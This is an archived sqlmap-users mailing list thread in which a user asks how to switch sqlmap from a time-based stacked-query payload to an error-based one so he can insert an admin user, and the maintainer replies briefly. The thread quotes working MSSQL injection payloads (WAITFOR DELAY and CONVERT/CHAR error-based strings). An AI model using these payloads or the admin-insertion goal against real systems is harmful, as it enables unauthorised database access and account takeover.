Re: [sqlmap-users] Change Payload ,Insert problem
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Change Payload ,Insert problem
|
From: Miroslav S. <mir...@gm...> - 2015-02-09 12:19:59
|
Really not sure what are you trying to do. Do you want that "error-based" query to be part of "stacked-query" or what? Bye On Mon, Feb 9, 2015 at 12:24 AM, a dehqan <deh...@gm...> wrote: > Maybe my question isn't clear , let me try again : > > I need to change stack query to not using timebase detection ? > > > Sqlmap detect injection there by error base type too, like this : > > > Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT > CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN > (9622=9622) THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV > > How can i have this payload with type of stack query > > Regards > > On Mon, Feb 9, 2015 at 2:42 AM, a dehqan <deh...@gm...> wrote: > >> Guys is there any chance ? >> >> Thanks in advance >> >> On Thu, Feb 5, 2015 at 7:31 PM, a dehqan <deh...@gm...> wrote: >> >>> I mean how may i have custom payload : >>> >>> Payload: req=6&senderid=1' AND 9622=CONVERT(INT,(SELECT >>> CHAR(113)+CHAR(101)+CHAR(111)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN >>> (9622=9622) THEN CHAR(49) ELSE CHAR(48) >>> END))+CHAR(113)+CHAR(98)+CHAR(102)+CHAR(100)+CHAR(113))) AND 'PkmV'='PkmV >>> >>> On Thu, Feb 5, 2015 at 4:42 PM, a dehqan <deh...@gm...> wrote: >>> >>>> Hi >>>> >>>> sqlmap gave me shell with injection type of stack queries ,but >>>> Payload is like this : >>>> >>>> id=6&rid=1'; WAITFOR DELAY '0:0:5'-- >>>> >>>> When i want insert with admin user sqlmap returns NULL and fails , >>>> Only says this before trying : >>>> >>>> [WARNING] time-based comparison requires larger statistical model, >>>> please wait.............................. >>>> >>>> Maybe i should change Payload , with what switch i can change payload ? >>>> >>>> >>>> Regards >>>> >>> >>> >> > > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming. The Go Parallel Website, > sponsored by Intel and developed in partnership with Slashdot Media, is > your > hub for all things parallel software development, from weekly thought > leadership blogs to news, videos, case studies, tutorials and more. Take a > look and join the conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
